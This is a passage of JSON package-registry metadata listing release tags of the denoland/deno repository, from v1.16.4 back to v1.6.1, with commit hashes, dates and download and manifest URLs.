t":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T2